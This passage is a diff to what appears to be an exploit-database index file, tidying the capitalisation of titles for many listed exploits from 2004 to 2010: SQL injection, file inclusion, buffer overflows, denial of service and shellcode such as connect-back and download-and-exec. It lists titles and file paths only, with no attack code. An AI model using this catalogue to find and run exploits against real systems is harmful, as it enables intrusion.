Talamantes",windows,dos,0 @@ -11432,7 +11432,7 @@ id,file,description,date,author,platform,type,port 12552,platforms/php/webapps/12552.txt,"tekno.Portal 0.1b - (makale.php id) SQL Injection Vulnerability",2010-05-10,CoBRa_21,php,webapps,0 12553,platforms/php/webapps/12553.txt,"Dark Hart Portal (login.php) Remote File Inclusion Vulnerability",2010-05-10,CoBRa_21,php,webapps,0 12554,platforms/php/dos/12554.txt,"MiniManager For Mangos/Trinity Server DoS Vulnerability",2010-05-10,XroGuE,php,dos,0 -12555,platforms/multiple/dos/12555.txt,"Pargoon CMS all version - DoS Vulnerability",2010-05-10,"Pouya Daneshmand",multiple,dos,0 +12555,platforms/multiple/dos/12555.txt,"Pargoon CMS - DoS Vulnerability",2010-05-10,"Pouya Daneshmand",multiple,dos,0 12556,platforms/php/webapps/12556.txt,"Tadbir CMS (fckeditor) Remote Arbitrary File Upload Exploit Vulnerability",2010-05-10,"Pouya Daneshmand",php,webapps,0 12557,platforms/php/webapps/12557.txt,"family connections 2.2.3 - Multiple Vulnerabilities",2010-05-10,"Salvatore Fresta",php,webapps,0 12558,platforms/php/webapps/12558.txt,"29o3 CMS (LibDir) Multiple RFI Vulnerability",2010-05-10,eidelweiss,php,webapps,0 @@ -11449,7 +11449,7 @@ id,file,description,date,author,platform,type,port 12570,platforms/php/webapps/12570.txt,"Uploader 0.1.5 - Multiple Vulnerabilities",2010-05-11,indoushka,php,webapps,0 12571,platforms/asp/webapps/12571.txt,"e-webtech (page.asp) SQL Injection Vulnerability",2010-05-11,CoBRa_21,asp,webapps,0 12572,platforms/php/webapps/12572.txt,"Free Advertisment cms (user_info.php) SQL Injection Vulnerability",2010-05-11,XroGuE,php,webapps,0 -12573,platforms/windows/remote/12573.html,"Apple Safari 4.0.5 parent.close() (memory corruption) 0day Code Execution Exploit",2010-05-11,"Krystian Kloskowski",windows,remote,0 +12573,platforms/windows/remote/12573.html,"Apple Safari 4.0.5 - parent.close() (memory corruption) Code Execution Exploit (0day)",2010-05-11,"Krystian Kloskowski",windows,remote,0 12574,platforms/php/webapps/12574.txt,"Joomla Module Camp26 Visitor Data 1.1 - Remote code Execution",2010-05-11,"Chip d3 bi0s",php,webapps,0 12575,platforms/php/webapps/12575.txt,"Marinet cms SQL Injection Vulnerability",2010-05-11,XroGuE,php,webapps,0 12576,platforms/php/webapps/12576.txt,"Woodall Creative SQL Injection Vulnerability",2010-05-11,XroGuE,php,webapps,0 @@ -11462,15 +11462,15 @@ id,file,description,date,author,platform,type,port 12583,platforms/php/webapps/12583.txt,"e-webtech (fixed_page.asp) SQL Injection Vulnerability",2010-05-12,FL0RiX,php,webapps,0 12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 (fckeditor) Remote Arbitrary File Upload Vulnerability",2010-05-12,eidelweiss,php,webapps,0 12585,platforms/php/webapps/12585.txt,"4images <= 1.7.7 (image_utils.php) Remote Command Execution Vulnerability",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0 -12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection exploit",2010-05-13,Cryptovirus,php,webapps,0 -12587,platforms/linux/remote/12587.c,"wftpd server 3.30 Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21 +12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection Exploit",2010-05-13,Cryptovirus,php,webapps,0 +12587,platforms/linux/remote/12587.c,"wftpd server 3.30 - Multiple Vulnerabilities (0day)",2010-05-13,"fl0 fl0w",linux,remote,21 12588,platforms/linux/dos/12588.txt,"Samba Multiple DoS Vulnerabilities",2010-05-13,"laurent gaffie",linux,dos,0 12590,platforms/php/webapps/12590.txt,"Joomla Component com_konsultasi (sid) SQL Injection Vulnerability",2010-05-13,c4uR,php,webapps,0 12591,platforms/php/webapps/12591.txt,"BlaB! Lite <= 0.5 - Remote File Inclusion Vulnerability",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0 12592,platforms/php/webapps/12592.txt,"Joomla Component advertising (com_aardvertiser) 2.0 - Local File Inclusion Vulnerability",2010-05-13,eidelweiss,php,webapps,0 12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox XSS Vulnerability",2010-05-13,"Valentin Hoebel",php,webapps,0 12594,platforms/php/webapps/12594.txt,"Joomla Component Seber Cart (getPic.php) Local File Disclosure Vulnerability",2010-05-13,AntiSecurity,php,webapps,0 -12595,platforms/php/webapps/12595.txt,"Joomla Component FDione Form Wizard lfi vulnerability",2010-05-13,"Chip d3 bi0s",php,webapps,0 +12595,platforms/php/webapps/12595.txt,"Joomla Component FDione Form Wizard lfi Vulnerability",2010-05-13,"Chip d3 bi0s",php,webapps,0 12596,platforms/php/webapps/12596.txt,"Link Bid Script (links.php id) SQL Injection Vulnerability",2010-05-14,R3d-D3V!L,php,webapps,0 12597,platforms/php/webapps/12597.txt,"Press Release Script (page.php id) SQL Injection Vulnerability",2010-05-14,R3d-D3V!L,php,webapps,0 12598,platforms/php/webapps/12598.txt,"JE Ajax Event Calendar Local File Inclusion Vulnerability",2010-05-14,Valentin,php,webapps,0 @@ -11480,26 +11480,26 @@ id,file,description,date,author,platform,type,port 12603,platforms/windows/dos/12603.py,"SmallFTPD FTP Server 1.0.3 - DELE Command DoS",2010-05-14,"Jeremiah Talamantes",windows,dos,0 12604,platforms/windows/dos/12604.py,"TYPSoft FTP Server 1.10 - RETR Command DoS",2010-05-14,"Jeremiah Talamantes",windows,dos,0 12605,platforms/windows/dos/12605.html,"IncrediMail (ImShExtU.dll) ActiveX Memory Corruption",2010-05-14,Lincoln,windows,dos,0 -12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS- SQL injection vulnerability",2010-05-14,Locu,asp,webapps,0 +12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS- SQL Injection Vulnerability",2010-05-14,Locu,asp,webapps,0 12607,platforms/php/webapps/12607.txt,"Joomla Component com_jequoteform - Local File Inclusion",2010-05-14,"ALTBTA ",php,webapps,0 12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - (photogallery_open.php) SQL Injection Vulnerability",2010-05-14,CoBRa_21,php,webapps,0 12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum (buyer/index.php) SQL Injection Vulnerability",2010-05-14,GuN,php,webapps,0 -12610,platforms/multiple/webapps/12610.txt,"VMware View Portal <= 3.1 XSS vulnerability",2010-05-14,"Alexey Sintsov",multiple,webapps,0 +12610,platforms/multiple/webapps/12610.txt,"VMware View Portal <= 3.1 - XSS Vulnerability",2010-05-14,"Alexey Sintsov",multiple,webapps,0 12611,platforms/php/webapps/12611.txt,"Joomla Component MS Comment 0.8.0b - LFI Vulnerability",2010-05-15,Xr0b0t,php,webapps,0 12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability",2010-05-15,CoBRa_21,php,webapps,0 12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 (tiny_mce) Remote File Upload",2010-05-15,ITSecTeam,php,webapps,0 -12614,platforms/windows/remote/12614.txt,"Safari 4.0.5 - parent.close() Memory Corruption exploit (ASLR and DEP bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0 +12614,platforms/windows/remote/12614.txt,"Safari 4.0.5 - parent.close() Memory Corruption Exploit (ASLR and DEP bypass)",2010-05-15,"Alexey Sintsov",windows,remote,0 12615,platforms/php/webapps/12615.txt,"Joomla Component com_camp SQL Injection Vulnerability",2010-05-15,"Kernel Security Group",php,webapps,0 12617,platforms/php/webapps/12617.txt,"File Thingie 2.5.5 - File Security Bypass",2010-05-16,"Jeremiah Talamantes",php,webapps,0 12618,platforms/php/webapps/12618.txt,"Joomla Component simpledownload 0.9.5 - LFI Vulnerability",2010-05-16,Xr0b0t,php,webapps,0 12619,platforms/php/webapps/12619.txt,"Cybertek CMS Local File Include Vulnerability",2010-05-16,XroGuE,php,webapps,0 12620,platforms/php/webapps/12620.txt,"The iceberg 'Content Management System' SQL Injection Vulnerability",2010-05-16,cyberlog,php,webapps,0 -12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - (.zip) 0day Stack Buffer Overflow PoC exploit",2010-05-16,sud0,windows,local,0 +12621,platforms/windows/local/12621.pl,"Shellzip 3.0 Beta 3 - (.zip) Stack Buffer Overflow PoC Exploit (0day)",2010-05-16,sud0,windows,local,0 12623,platforms/php/webapps/12623.txt,"Joomla Component simpledownload 0.9.5 - Local File Disclosure",2010-05-16,"ALTBTA ",php,webapps,0 12624,platforms/php/webapps/12624.txt,"LinPHA <= 1.3.2 - (rotate.php) Remote Command Execution Vulnerability",2010-05-16,"Sn!pEr.S!Te Hacker",php,webapps,0 12628,platforms/php/webapps/12628.txt,"EgO 0.7b - (fckeditor) Remote File Upload",2010-05-16,ITSecTeam,php,webapps,0 12629,platforms/php/webapps/12629.txt,"Tainos Multiple Vulnerabilities",2010-05-16,XroGuE,php,webapps,0 -12630,platforms/php/webapps/12630.txt,"I-Vision CMS - XSS, SQL injection vulnerability",2010-05-16,Ariko-Security,php,webapps,0 +12630,platforms/php/webapps/12630.txt,"I-Vision CMS - XSS, SQL Injection Vulnerability",2010-05-16,Ariko-Security,php,webapps,0 12631,platforms/php/webapps/12631.txt,"Tainos Webdesign (All Scripts) SQL/XSS/HTML Injection Vulnerability",2010-05-17,CoBRa_21,php,webapps,0 12632,platforms/php/webapps/12632.txt,"Joomla Component com_crowdsource SQL Injection",2010-05-17,ByEge,php,webapps,0 12633,platforms/php/webapps/12633.txt,"Joomla Component com_event Multiple Vulnerabilities",2010-05-17,"ALTBTA ",php,webapps,0 @@ -11517,10 +11517,10 @@ id,file,description,date,author,platform,type,port 12646,platforms/php/webapps/12646.txt,"B-Hind CMS (tiny_mce) Remote File Upload",2010-05-18,"innrwrld and h00die",php,webapps,0 12647,platforms/php/webapps/12647.txt,"Webloader 7 - 8 (vid) SQL Injection Vulnerability",2010-05-18,ByEge,php,webapps,0 12648,platforms/php/webapps/12648.txt,"Joomla Component com_packages SQL Injection Vulnerability",2010-05-18,"Kernel Security Group",php,webapps,0 -12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 activex buffer overflow",2010-05-18,"Rad L. Sneak",windows,dos,0 +12650,platforms/windows/dos/12650.txt,"Attachmate Reflection Standard Suite 2008 activex Buffer overflow",2010-05-18,"Rad L. Sneak",windows,dos,0 12651,platforms/php/webapps/12651.txt,"Lokomedia CMS (sukaCMS) Local File Disclosure Vulnerability",2010-05-18,"vir0e5 ",php,webapps,0 -12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 and below Hack GENOCIDE Environment overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 -12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD 5.0 and below Hack PATH Environment overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 +12652,platforms/netbsd_x86/dos/12652.sh,"NetBSD 5.0 and below Hack GENOCIDE Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 +12653,platforms/netbsd_x86/dos/12653.sh,"NetBSD 5.0 and below Hack PATH Environment Overflow proof of concept",2010-05-18,JMIT,netbsd_x86,dos,0 12654,platforms/php/webapps/12654.txt,"DB[CMS] 2.0.1 - SQL Injection Vulnerability",2010-05-18,Pokeng,php,webapps,0 12655,platforms/windows/dos/12655.txt,"QtWeb Browser 3.3 - DoS",2010-05-18,PoisonCode,windows,dos,0 12656,platforms/php/webapps/12656.txt,"Battle Scrypt Shell Upload Vulnerability",2010-05-19,DigitALL,php,webapps,0 @@ -11549,12 +11549,12 @@ id,file,description,date,author,platform,type,port 12687,platforms/windows/dos/12687.pl,"WinDirectAudio 1.0 - (.WAV) PoC",2010-05-21,ahwak2000,windows,dos,0 12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery <= 3.1 - (gallery.php) Remote File Inclusion Vulnerability",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0 12689,platforms/multiple/webapps/12689.txt,"Authenticated Cross-Site Scripting Vulnerability (XSS) within Apache Axis2 administration console",2010-05-21,"Richard Brain",multiple,webapps,0 -12690,platforms/php/webapps/12690.php,"cardinalCms 1.2 (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0 +12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 (fckeditor) Arbitrary File Upload Exploit.",2010-05-21,Ma3sTr0-Dz,php,webapps,0 12691,platforms/php/webapps/12691.txt,"Online Job Board (Auth Bypass) SQL Injection Vulnerability",2010-05-21,"cr4wl3r ",php,webapps,0 12692,platforms/php/webapps/12692.txt,"TinyBrowser Remote File upload Vulnerability",2010-05-22,Ra3cH,php,webapps,0 12693,platforms/asp/webapps/12693.txt,"Asset Manager Remote File upload Vulnerability",2010-05-22,Ra3cH,asp,webapps,0 12694,platforms/php/webapps/12694.txt,"Tochin Ecommerce Multiple Remote Vulnerability",2010-05-22,cyberlog,php,webapps,0 -12695,platforms/php/webapps/12695.txt,"Azimut Technologie Admin Login Bypass vulnerability",2010-05-22,Ra3cH,php,webapps,0 +12695,platforms/php/webapps/12695.txt,"Azimut Technologie Admin Login Bypass Vulnerability",2010-05-22,Ra3cH,php,webapps,0 12696,platforms/php/webapps/12696.txt,"E-commerce Group (cat.php) SQL Injection Vulnerability",2010-05-22,"BLack Revenge",php,webapps,0 12697,platforms/php/webapps/12697.php,"hustoj (fckeditor) Remote Arbitrary File Upload Exploit",2010-05-22,eidelweiss,php,webapps,0 12698,platforms/windows/dos/12698.py,"Open&Compact Ftp Server 1.2 ""PORT"" command Remote DoS",2010-05-22,Ma3sTr0-Dz,windows,dos,0 @@ -11563,7 +11563,7 @@ id,file,description,date,author,platform,type,port 12701,platforms/asp/webapps/12701.txt,"Rave Creations/UHM (artists.asp) SQL Injection Vulnerability",2010-05-22,Ra3cH,asp,webapps,0 12702,platforms/php/webapps/12702.php,"ECShop Search.php SQL Injection Exploit",2010-05-22,Jannock,php,webapps,0 12703,platforms/php/webapps/12703.txt,"Recipes Website 1.0 - SQL Injection",2010-05-22,Mr.ThieF,php,webapps,0 -12704,platforms/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - (.rm file) buffer Overflow PoC",2010-05-23,"sniper ip",windows,dos,0 +12704,platforms/windows/dos/12704.txt,"Media Player Classic 1.3.1774.0 - (.rm file) Buffer Overflow PoC",2010-05-23,"sniper ip",windows,dos,0 12706,platforms/php/webapps/12706.txt,"MMA Creative Design SQL Injection Vulnerability",2010-05-23,XroGuE,php,webapps,0 12707,platforms/php/webapps/12707.txt,"runt-communications Design SQL Injection Vulnerability",2010-05-23,XroGuE,php,webapps,0 12709,platforms/php/webapps/12709.txt,"webperformance Ecommerce SQL Vulnerability",2010-05-23,cyberlog,php,webapps,0 @@ -11581,11 +11581,11 @@ id,file,description,date,author,platform,type,port 12721,platforms/php/webapps/12721.txt,"Apache Axis2 1.4.1 - Local File Inclusion Vulnerability",2010-05-24,HC,php,webapps,0 12722,platforms/php/webapps/12722.txt,"interuse Website Builder & design (index2.php) SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0 12723,platforms/php/webapps/12723.py,"Joomla com_qpersonel SQL Injection Remote Exploit",2010-05-24,"Valentin Hoebel",php,webapps,0 -12724,platforms/php/webapps/12724.php,"WebAsys blindSQL-inj exploit",2010-05-24,zsh.shell,php,webapps,0 +12724,platforms/php/webapps/12724.php,"WebAsys blindSQL-inj Exploit",2010-05-24,zsh.shell,php,webapps,0 12725,platforms/php/webapps/12725.txt,"ALSCO CMS SQL Injection Vulnerabilities",2010-05-24,PrinceofHacking,php,webapps,0 -12726,platforms/php/webapps/12726.txt,"REvolution <= 10.02 CSRF (Cross-Site Request Forgery)",2010-05-24,"High-Tech Bridge SA",php,webapps,0 +12726,platforms/php/webapps/12726.txt,"REvolution <= 10.02 - CSRF (Cross-Site Request Forgery)",2010-05-24,"High-Tech Bridge SA",php,webapps,0 12727,platforms/php/webapps/12727.txt,"LiSK CMS 4.4 - SQL Injection Vulnerability",2010-05-24,"High-Tech Bridge SA",php,webapps,0 -12728,platforms/windows/webapps/12728.txt,"Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure vulnerability",2010-05-24,"Praveen Darshanam",windows,webapps,0 +12728,platforms/windows/webapps/12728.txt,"Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure Vulnerability",2010-05-24,"Praveen Darshanam",windows,webapps,0 12729,platforms/php/webapps/12729.txt,"Blox CMS SQL Injection Vulnerability",2010-05-24,CoBRa_21,php,webapps,0 12730,platforms/multiple/webapps/12730.txt,"ProWeb Design SQL Injection Vulnerability",2010-05-24,cyberlog,multiple,webapps,0 12731,platforms/php/webapps/12731.txt,"Webloader 8 - SQL Injection Vulnerability",2010-05-24,ByEge,php,webapps,0 @@ -11594,10 +11594,10 @@ id,file,description,date,author,platform,type,port 12735,platforms/php/webapps/12735.txt,"NITRO Web Gallery SQL Injection Vulnerability",2010-05-25,cyberlog,php,webapps,0 12736,platforms/php/webapps/12736.txt,"Website Design and Hosting By Netricks, Inc (news.php) SQL Injection Vulnerability",2010-05-25,"Dr.SiLnT HilL",php,webapps,0 12737,platforms/php/webapps/12737.txt,"Simpel Side - (index2.php) SQL Injection Vulnerability",2010-05-25,MN9,php,webapps,0 -12740,platforms/windows/dos/12740.py,"Webby Webserver - POC SEH control (0day)",2010-05-25,m-1-k-3,windows,dos,0 +12740,platforms/windows/dos/12740.py,"Webby Webserver - PoC SEH control (0day)",2010-05-25,m-1-k-3,windows,dos,0 12741,platforms/windows/dos/12741.py,"Open&Compact Ftp Server 1.2 Universal Pre-Auth Denial of Service",2010-05-25,Dr_IDE,windows,dos,0 12743,platforms/php/webapps/12743.txt,"web5000 (page_show) SQL Injection Vulnerability",2010-05-25,"BLack Revenge",php,webapps,0 -12744,platforms/php/webapps/12744.txt,"Webit Cms SQL Injection Vulnerability",2010-05-25,CoBRa_21,php,webapps,0 +12744,platforms/php/webapps/12744.txt,"Webit CMS SQL Injection Vulnerability",2010-05-25,CoBRa_21,php,webapps,0 12746,platforms/php/webapps/12746.txt,"Spaceacre (SQL/XSS/HTML) Injection Vulnerabilities",2010-05-26,XroGuE,php,webapps,0 12748,platforms/php/webapps/12748.txt,"Multi Vendor Mall (pages.php) SQL Injection Vulnerability",2010-05-26,Newbie_Campuz,php,webapps,0 12749,platforms/php/webapps/12749.txt,"Book Gallery (aboutbook.php) SQL Injection Vulnerability",2010-05-26,Mr.P3rfekT,php,webapps,0 @@ -11605,7 +11605,7 @@ id,file,description,date,author,platform,type,port 12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 ABR File Handling Remote Buffer Overflow PoC",2010-05-26,LiquidWorm,windows,dos,0 12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 GRD File Handling Remote Buffer Overflow PoC",2010-05-26,LiquidWorm,windows,dos,0 12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 ASL File Handling Remote BoF PoC",2010-05-26,LiquidWorm,windows,dos,0 -12754,platforms/php/webapps/12754.html,"Easy Address book Webserver 1.2 CSRF",2010-05-26,Markot,php,webapps,0 +12754,platforms/php/webapps/12754.html,"Easy Address book Webserver 1.2 - CSRF",2010-05-26,Markot,php,webapps,0 12755,platforms/php/webapps/12755.txt,"Multi Vendor Mall (itemdetail.php & shop.php) SQL Injection Vulnerability",2010-05-26,CoBRa_21,php,webapps,0 12756,platforms/php/webapps/12756.txt,"Spaceacre (index.php) SQL/HTML/XSS Injection Vulnerability",2010-05-26,CoBRa_21,php,webapps,0 12761,platforms/php/webapps/12761.txt,"GlobalWebTek Design SQL Injection Vulnerability",2010-05-27,cyberlog,php,webapps,0 @@ -11616,7 +11616,7 @@ id,file,description,date,author,platform,type,port 12768,platforms/php/webapps/12768.txt,"Hampshire Trading Standards Script SQL Injection Vulnerability",2010-05-27,Mr.P3rfekT,php,webapps,0 12769,platforms/php/webapps/12769.txt,"Joomla Component MediQnA 1.1 - LFI Vulnerability",2010-05-27,kaMtiEz,php,webapps,0 12770,platforms/php/webapps/12770.txt,"toronja cms SQL Injection Vulnerability",2010-05-27,cyberlog,php,webapps,0 -12771,platforms/php/webapps/12771.txt,"Toronja Cms HTML/XSS Injection Vulnerability",2010-05-27,CoBRa_21,php,webapps,0 +12771,platforms/php/webapps/12771.txt,"Toronja CMS HTML/XSS Injection Vulnerability",2010-05-27,CoBRa_21,php,webapps,0 12772,platforms/php/webapps/12772.txt,"Realtor WebSite System E-Commerce SQL Injection Vulnerability",2010-05-27,cyberlog,php,webapps,0 12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent (idproperty) SQL Injection Vulnerability",2010-05-28,v3n0m,php,webapps,0 12774,platforms/windows/dos/12774.py,"HomeFTP Server r1.10.3 (build 144) Denial of Service Exploit",2010-05-28,Dr_IDE,windows,dos,0 @@ -11648,14 +11648,14 @@ id,file,description,date,author,platform,type,port 12808,platforms/php/webapps/12808.txt,"PTC Site's RCE/XSS Vulnerability",2010-05-30,CrazyMember,php,webapps,0 12809,platforms/php/webapps/12809.txt,"Symphony CMS Local File Inclusion Vulnerability",2010-05-30,AntiSecurity,php,webapps,0 12811,platforms/php/webapps/12811.txt,"Oscommerce Online Merchant 2.2 - Remote File Upload",2010-05-30,MasterGipy,php,webapps,0 -12812,platforms/php/webapps/12812.txt,"Joomla com_quran SQL Injection vulnerability",2010-05-30,r3m1ck,php,webapps,0 +12812,platforms/php/webapps/12812.txt,"Joomla com_quran SQL Injection Vulnerability",2010-05-30,r3m1ck,php,webapps,0 12813,platforms/php/webapps/12813.txt,"WsCMS SQL Injection Vulnerability [ Multiple Vulnerabilities ]",2010-05-31,cyberlog,php,webapps,0 -12814,platforms/php/webapps/12814.txt,"Joomla Component com_g2bridge LFI vulnerability",2010-05-31,akatsuchi,php,webapps,0 +12814,platforms/php/webapps/12814.txt,"Joomla Component com_g2bridge LFI Vulnerability",2010-05-31,akatsuchi,php,webapps,0 12815,platforms/windows/remote/12815.txt,"GoAheaad Webserver Source Code Disclosure Vulnerability",2010-05-30,Sil3nt_Dre4m,windows,remote,0 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 (.zar) DoS",2010-05-31,TecR0c,windows,dos,0 12817,platforms/php/webapps/12817.txt,"QuickTalk 1.2 - Multiple Vulnerabilities (Source Code Disclosure)",2010-05-31,indoushka,php,webapps,0 12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full Mullti (RFI/XSS) Vulnerabilities",2010-05-31,indoushka,php,webapps,0 -12819,platforms/php/webapps/12819.txt,"Persian E107 XSS Vulnerability",2010-05-31,indoushka,php,webapps,0 +12819,platforms/php/webapps/12819.txt,"Persian E107 - XSS Vulnerability",2010-05-31,indoushka,php,webapps,0 12820,platforms/php/webapps/12820.txt,"Visitor Logger (banned.php) Remote File Include Vulnerability",2010-05-31,bd0rk,php,webapps,0 12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - SEH Exploit",2010-05-31,Stoke,windows,local,0 12822,platforms/php/webapps/12822.txt,"Joomla Component com_jsjobs SQL Injection Vulnerability",2010-05-31,d0lc3,php,webapps,0 @@ -11966,7 +11966,7 @@ id,file,description,date,author,platform,type,port 13525,platforms/win32/shellcode/13525.c,"Windows 9x/NT/2k/XP PEB method 29 bytes",2005-07-26,loco,win32,shellcode,0 13526,platforms/win32/shellcode/13526.c,"Windows 9x/NT/2k/XP PEB method 31 bytes",2005-01-26,twoci,win32,shellcode,0 13527,platforms/win32/shellcode/13527.c,"Windows 9x/NT/2k/XP PEB method 35 bytes",2005-01-09,oc192,win32,shellcode,0 -13528,platforms/win32/shellcode/13528.c,"win xp/2000/2003 Connect Back shellcode for Overflow exploit 275 bytes",2004-10-25,lion,win32,shellcode,0 +13528,platforms/win32/shellcode/13528.c,"win xp/2000/2003 Connect Back shellcode for Overflow Exploit 275 bytes",2004-10-25,lion,win32,shellcode,0 13529,platforms/win32/shellcode/13529.c,"win xp/2000/2003 Download File and Exec 241 bytes",2004-10-25,lion,win32,shellcode,0 13530,platforms/win32/shellcode/13530.asm,"windows/XP download and exec source",2004-09-26,"Peter Winter-Smith",win32,shellcode,0 13531,platforms/win32/shellcode/13531.c,"windows/XP-sp1 portshell on port 58821 116 bytes",2004-09-26,silicon,win32,shellcode,0 @@ -12057,8 +12057,8 @@ id,file,description,date,author,platform,type,port 13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion Vulnerability",2010-06-06,eidelweiss,php,webapps,0 13737,platforms/php/webapps/13737.txt,"Joomla Component com_djartgallery Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0 13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0 -13739,platforms/php/webapps/13739.txt,"WmsCMS - XSS, SQL injection vulnerability",2010-06-06,Ariko-Security,php,webapps,0 -13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - sqli and xss vulnerability",2010-06-06,Sid3^effects,php,webapps,0 +13739,platforms/php/webapps/13739.txt,"WmsCMS - XSS, SQL Injection Vulnerability",2010-06-06,Ariko-Security,php,webapps,0 +13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQLi and XSS Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13741,platforms/php/webapps/13741.txt,"iScripts easybiller 1.1 - SQL Injection Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13742,platforms/linux/shellcode/13742.c,"48 bytes chown root:root /bin/sh x86 linux shellcode",2010-06-06,gunslinger_,linux,shellcode,0 13743,platforms/linux/shellcode/13743.c,"45 bytes give all user root access when execute /bin/sh x86 linux shellcode",2010-06-06,gunslinger_,linux,shellcode,0 @@ -12067,19 +12067,19 @@ id,file,description,date,author,platform,type,port 13746,platforms/php/webapps/13746.txt,"Joomla Component com_searchlog SQL Injection",2010-06-06,d0lc3,php,webapps,0 13747,platforms/php/webapps/13747.txt,"PHP Car Rental Complete System 1.2 - SQL Injection Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13748,platforms/php/webapps/13748.txt,"Joomla Component com_annonces Upload Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 -13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 sqli vulnerability",2010-06-06,Sid3^effects,php,webapps,0 +13749,platforms/php/webapps/13749.txt,"idevspot Text ads 2.08 SQLi Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13750,platforms/php/webapps/13750.txt,"WebBiblio Subject Gateway System LFI Vulnerability",2010-06-06,AntiSecurity,php,webapps,0 13751,platforms/php/webapps/13751.txt,"greeting card Remote Upload Vulnerability",2010-06-06,Mr.Benladen,php,webapps,0 -13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone 2.0 Beta - SQL Injection and XSS vulnerability",2010-06-06,Sid3^effects,php,webapps,0 +13752,platforms/php/webapps/13752.txt,"reVou Twitter Clone 2.0 Beta - SQL Injection and XSS Vulnerability",2010-06-06,Sid3^effects,php,webapps,0 13754,platforms/multiple/webapps/13754.txt,"JForum 2.1.8 bookmarks CSRF & XSS",2010-06-07,"Adam Baldwin",multiple,webapps,0 13756,platforms/windows/local/13756.py,"VUPlayer <= 2.49 - (.m3u) Universal Buffer Overflow Exploit (DEP bypass)",2010-06-07,mr_me,windows,local,0 -13760,platforms/windows/local/13760.py,"Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit",2010-06-07,sud0,windows,local,0 +13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit (0day)",2010-06-07,sud0,windows,local,0 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 SEH Buffer Overflow",2010-06-07,chap0,windows,local,0 13762,platforms/php/webapps/13762.txt,"CommonSense CMS SQL Injection Vulnerability",2010-06-07,Pokeng,php,webapps,0 -13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 0day Stack Buffer Overflow PoC exploit ROP/WPM",2010-06-07,sud0,windows,local,0 +13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow PoC Exploit ROP/WPM (0day)",2010-06-07,sud0,windows,local,0 13766,platforms/php/webapps/13766.txt,"Home of MCLogin System - Authentication Bypass",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow PoC Exploit",2010-06-08,mr_me,windows,local,0 -13768,platforms/php/local/13768.py,"Castripper 2.50.70 - (.pls) stack buffer overflow DEP bypass exploit",2010-06-08,mr_me,php,local,0 +13768,platforms/php/local/13768.py,"Castripper 2.50.70 - (.pls) Stack Buffer Overflow DEP bypass Exploit",2010-06-08,mr_me,php,local,0 13769,platforms/php/webapps/13769.txt,"CafeEngine CMS 2.3 - SQLI Vulnerability",2010-06-08,Sid3^effects,php,webapps,0 13770,platforms/php/webapps/13770.txt,"Hotel / Resort Site Script with OnLine Reservation System",2010-06-08,"L0rd CrusAd3r",php,webapps,0 13771,platforms/php/webapps/13771.txt,"EMO Realty Manager SQLi Vulnerable",2010-06-08,"L0rd CrusAd3r",php,webapps,0 @@ -12095,13 +12095,13 @@ id,file,description,date,author,platform,type,port 13782,platforms/php/webapps/13782.txt,"Image Store Remote file Upload Vulnerability",2010-06-08,Mr.FireStormm,php,webapps,0 13783,platforms/php/webapps/13783.txt,"GREEZLE - Global Real Estate Agent Site Auth SQL Injection",2010-06-09,"L0rd CrusAd3r",php,webapps,0 13784,platforms/php/webapps/13784.txt,"HauntmAx CMS 